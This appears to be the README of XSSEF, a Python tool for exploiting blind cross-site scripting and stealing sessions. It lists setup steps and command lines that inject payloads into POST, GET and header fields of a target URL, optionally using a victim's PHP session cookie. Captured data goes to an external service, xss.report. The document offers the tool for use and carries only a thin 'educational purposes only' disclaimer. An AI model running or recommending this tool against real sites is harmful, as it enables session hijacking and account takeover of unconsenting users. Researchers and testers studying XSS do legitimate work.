Blind Cross Site Scripting Vulnerability Exploitation Freamwork Authenticated & Unauthenticated POST,GET,HTTPHEADER xss exploitation & session stealing freamwork. In order to use it, you must be registered to the Freamwork System (xss.report)
It is for educational purposes only. In case of abuse, the user is responsible.
1)- USAGE BOOK
2)- REQUIREMENTS
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
$ git clone https://github.com/ringzerofy/XSSEF.git
$ cd XSSEF-master
$ chmod 777 * (Linux)
$ python xssef.py --help
--user [-u] -> Freamwork Usrname
--target [-t] -> (VULNERABLE) TARGET URL
--post [-p] -> VULNERABLE POST PARAMETHER
--get [-g] -> VULNERABLE GET PARAMETHER
--cookie [-c] -> COOKI FOR AUTHENTICATIONS (FOR AUTHENTICATED VULNERABILITIES)
Python Version >= 3.0
$pip install -m requests
$pip install -m argparse
XXSEF Freamwork Account
Unauthenticated POST Value Exploitation :
$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -p [VULNERABLE POST PARAMETHER]
Authenticated POST Value Exploitation :
$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -p [VULNERABLE POST PARAMETHER] -c [PHPSESSION ID FOR AUTHENTICATION]
Unauthenticated GET Value Exploitation :
$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -g [VULNERABLE GET PARAMETHER]
Authenticated GET Value Exploitation :
$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -g [VULNERABLE GET PARAMETHER] -c [PHPSESSION ID FOR AUTHENTICATION]
Unauthenticated HTTP HEADER Value Exploitation :
$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME]
Authenticated HTTP HEADER Value Exploitation :
$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -c [PHPSESSION ID FOR AUTHENTICATION]